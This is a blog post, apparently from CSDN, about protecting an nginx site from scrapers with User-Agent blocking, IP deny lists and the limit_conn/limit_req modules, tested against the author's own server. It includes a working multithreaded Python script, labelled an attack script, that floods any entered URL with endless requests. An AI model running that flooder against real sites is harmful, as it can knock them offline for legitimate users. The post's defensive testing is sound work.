Nginx Anti-Crawler

言之。

Column: nginx    Tags: nginx, python

Article link: https://blog.csdn.net/qq_44810930/article/details/113586620

Nginx anti-crawling

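I used Python's requests library to scrape images from my own website.
Fetching them in a while True loop made the site unreachable for normal clients.
nginx's access.log contained records like this: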

117.170.202.207 - - [03/Feb/2021:10:35:06 +0800] "GET /pics/05.jpg HTTP/1.1" 200 326446 "-" "python-requests/2.24.0" "-"

whereas a normal visit looks like this:

117.170.202.207 - - [03/Feb/2021:10:32:46 +0800] "GET /img/9.ico HTTP/1.1" 206 1 "http://www.guixueliang.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.56" "-"

The log_format I use is:

log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                        '$status $body_bytes_sent "$http_referer" '
                        '"$http_user_agent" "$http_x_forwarded_for"';

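What each field means:

$remote_addr            address of the client that accessed the site;
$remote_user            user name of the remote client (from HTTP Basic authentication);
$time_local             access time and time zone;
$request                the request line of the client's HTTP request;
$status                 HTTP status code returned for the request, e.g. 200, 404, 301;
$body_bytes_sent        number of response body bytes sent to the client;
$http_referer           the page the request came from (Referer header); can be used to set up hotlink protection;
$http_user_agent        client information (User-Agent header), e.g. browser or mobile client;
$http_x_forwarded_for   when a proxy server sits in front, records the original client address; this only works if the proxy also sets the X-Forwarded-For header;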
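To work with these records from a script, a line in the main format can be split back into its fields. The following is a minimal Python sketch that assumes lines follow the log_format above exactly; MAIN_LOG_RE and parse_line are hypothetical names, not part of nginx.

```python
import re

# Regex mirroring the "main" log_format above (assumption: lines are
# written in exactly that format; nginx escapes quotes inside fields).
MAIN_LOG_RE = re.compile(
    r'(?P<remote_addr>\S+) - (?P<remote_user>\S+) \[(?P<time_local>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<body_bytes_sent>\d+) '
    r'"(?P<http_referer>[^"]*)" "(?P<http_user_agent>[^"]*)" '
    r'"(?P<http_x_forwarded_for>[^"]*)"'
)


def parse_line(line):
    """Return a dict of log fields, or None if the line does not match."""
    m = MAIN_LOG_RE.match(line)
    return m.groupdict() if m else None


sample = ('117.170.202.207 - - [03/Feb/2021:10:35:06 +0800] '
          '"GET /pics/05.jpg HTTP/1.1" 200 326446 "-" '
          '"python-requests/2.24.0" "-"')
entry = parse_line(sample)
print(entry["remote_addr"], entry["status"], entry["http_user_agent"])
# prints: 117.170.202.207 200 python-requests/2.24.0
```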

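The python-requests/2.24.0 near the end of the line is the User-Agent (UA) sent by Python's requests library.
But simply blocking that UA is not effective, because a crawler can spoof it through its request headers.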

Nginx DDoS defense

Nginx crawler defense

After blocking the python-requests UA in nginx, a crawler that does not set its own headers gets:
403 Forbidden
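The post does not show the nginx rule that was used. As an illustration only, this Python sketch models the same idea as a case-insensitive regex match on the User-Agent (similar in spirit to nginx's ~* match operator); BLOCKED_UA and status_for are hypothetical names. It also shows why the check is easy to get around: any client that sends a browser-like UA passes.

```python
import re

# Hypothetical UA blacklist; the post only mentions python-requests.
BLOCKED_UA = re.compile(r"python-requests", re.IGNORECASE)


def status_for(user_agent):
    """Return 403 for a blacklisted User-Agent, otherwise 200 (sketch only)."""
    return 403 if BLOCKED_UA.search(user_agent or "") else 200


print(status_for("python-requests/2.24.0"))  # 403: the default requests UA
# A spoofed, browser-like UA passes the very same check:
print(status_for("Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/88.0"))  # 200
```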

My idea was to write a script that would:

monitor access.log and, if the same IP makes too many requests, add it straight to the nginx blacklist.
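A minimal sketch of such a script, assuming the main log format (client address first on each line) and a fixed request-count threshold. find_abusers, deny_rules, update_blacklist, the threshold and the file paths are all hypothetical. It counts requests per IP over the whole log and writes one nginx deny directive (from ngx_http_access_module) per offending address.

```python
import re
from collections import Counter

# Only the client address (first field of the "main" format) is needed.
IP_RE = re.compile(r"^(\S+) ")


def find_abusers(lines, threshold):
    """Return the IPs with at least `threshold` requests in `lines`, sorted."""
    counts = Counter()
    for line in lines:
        m = IP_RE.match(line)
        if m:
            counts[m.group(1)] += 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def deny_rules(ips):
    """Render one nginx `deny` directive per IP."""
    return "".join(f"deny {ip};\n" for ip in ips)


def update_blacklist(log_path, conf_path, threshold):
    """Hypothetical driver: scan the whole log and rewrite the deny file."""
    with open(log_path, encoding="utf-8", errors="replace") as f:
        ips = find_abusers(f, threshold)
    with open(conf_path, "w", encoding="utf-8") as f:
        f.write(deny_rules(ips))
    return ips
```

For the rules to take effect, the generated file would have to be pulled into the server configuration with an include directive, followed by nginx -s reload. A real monitor should also count only recent lines (for example a sliding window over $time_local) and whitelist trusted addresses: in the log excerpts above, the scraper and the normal browser visit both came from 117.170.202.207.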

Defending with nginx's built-in mechanisms

nginx documentation (Chinese)

https://www.nginx.cn/doc/index.html
http://tengine.taobao.org/nginx_docs/cn/docs/

Blocking IPs in nginx

https://www.nginx.cn/2487.html

First I tried nginx's built-in defense mechanisms:

1. Limit the number of connections
ngx_http_limit_conn_module
http://tengine.taobao.org/nginx_docs/cn/docs/http/ngx_http_limit_conn_module.html

2. Limit the request processing rate
ngx_http_limit_req_module
http://tengine.taobao.org/nginx_docs/cn/docs/http/ngx_http_limit_req_module.html
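The limit_req documentation describes its limiting as a "leaky bucket". The Python class below is a simplified model of that idea, not nginx's actual code: each key (for example a client IP) has an excess counter that drains at rate requests per second, and a request is rejected once the excess would exceed burst. Only the accept/reject decision is modeled; nginx also delays queued requests unless nodelay is set. LeakyBucket and allow are hypothetical names.

```python
class LeakyBucket:
    """Simplified per-key leaky bucket in the spirit of limit_req.

    rate:  requests per second that drain out of the bucket
    burst: how many excess requests may be queued before rejecting
    """

    def __init__(self, rate, burst=0):
        self.rate = rate
        self.burst = burst
        self.state = {}  # key -> (excess, time of last accepted request)

    def allow(self, key, now):
        if key not in self.state:
            self.state[key] = (0.0, now)
            return True
        excess, last = self.state[key]
        # Drain what leaked out since the last accepted request, add this one.
        excess = max(excess - self.rate * (now - last) + 1, 0.0)
        if excess > self.burst:
            return False  # rejected; state is left unchanged
        self.state[key] = (excess, now)
        return True


bucket = LeakyBucket(rate=1, burst=0)
print([bucket.allow("117.170.202.207", t) for t in (0, 0.5, 1.0, 1.1)])
# prints: [True, False, True, False]
```

With rate=1 and no burst, only about one request per second per key gets through; everything in between is rejected (nginx answers rejected requests with 503 by default, see limit_req_status).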

Python attack script

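import threading

import requests

# The actual User-Agent string was omitted in the original post.
headers = {"User-Agent": "...(omitted)"}

url = input("Enter the IP or URL to attack (with http/https): ")

strength = int(input("Enter the attack strength (number of threads) [2~16]: "))


def run(tid):
    """Request `url` in an endless loop and save each response body to disk."""
    n = 0
    while True:
        try:
            # Error responses (e.g. nginx's HTML error pages) are saved as .jpg too.
            result = requests.get(url, headers=headers, timeout=10).content
            # Prefix the file name with the thread id so threads don't overwrite each other.
            with open(f"{tid}_{n}.jpg", "wb") as f:
                f.write(result)
        except (requests.RequestException, OSError):
            pass  # ignore failed requests/writes and keep going
        n += 1
        print(tid, n)


print("Attacking...")
for tid in range(strength):
    threading.Thread(target=run, args=(tid,)).start()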

I started 16 threads that all requested the same image on my server at the same time.
The results:
[Screenshot: the downloaded files]

Within moments, hundreds of .jpg files had been downloaded, but only the 215 KB ones were real images. Each 1 KB file contained the following:

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.12.2</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
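(The repeated comment is padding that nginx adds so that MSIE and Chrome do not replace the page with their own "friendly" error page.)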
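Because the script saved every response body as a .jpg, nginx's HTML error pages ended up on disk next to the real images. A hedged sketch for telling them apart by content rather than by size: JPEG files begin with the bytes FF D8 FF, while the error page above begins with <html>. is_real_jpeg and split_downloads are hypothetical helpers.

```python
from pathlib import Path

JPEG_MAGIC = b"\xff\xd8\xff"  # JPEG files start with these bytes


def is_real_jpeg(data):
    """True if the bytes look like a JPEG rather than an HTML error page."""
    return data.startswith(JPEG_MAGIC)


def split_downloads(folder):
    """Split the *.jpg files in `folder` into (real images, error pages)."""
    real, fake = [], []
    for path in sorted(Path(folder).glob("*.jpg")):
        with path.open("rb") as f:
            head = f.read(len(JPEG_MAGIC))
        (real if is_real_jpeg(head) else fake).append(path.name)
    return real, fake
```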

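Summary of nginx's two defense modules, limit_conn / limit_req

These two modules did fend off part of the attack:

in 3 seconds the attack script made 247 requests, but only 3 of the downloaded photos were valid.

The catch is that my server is a student cloud instance with only 1 Mbit/s of bandwidth, i.e. a download speed of 1024/8 = 128 KB/s.
The attack still saturated that bandwidth,
so normal clients still could not access the site.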
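The bandwidth figure is simple arithmetic. The hypothetical helpers below reproduce it (using the post's convention of 1 Mbit = 1024 kbit) and extend it to the best-case time needed to send one 215 KB image, ignoring protocol overhead.

```python
def link_kb_per_s(mbit_per_s):
    """Convert a link speed in Mbit/s to KB/s (1 Mbit = 1024 kbit, 8 bits per byte)."""
    return mbit_per_s * 1024 / 8


def transfer_seconds(size_kb, mbit_per_s):
    """Best-case time to send `size_kb` KB over the link, ignoring overhead."""
    return size_kb / link_kb_per_s(mbit_per_s)


print(link_kb_per_s(1))                    # 128.0
print(round(transfer_seconds(215, 1), 2))  # 1.68
```

At this speed each full-size image occupies the whole link for about 1.7 seconds, so a couple of successful downloads are enough to keep it busy for several seconds, no matter how many other requests limit_req rejects.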

So it looks like I still need my original idea: banning IPs.
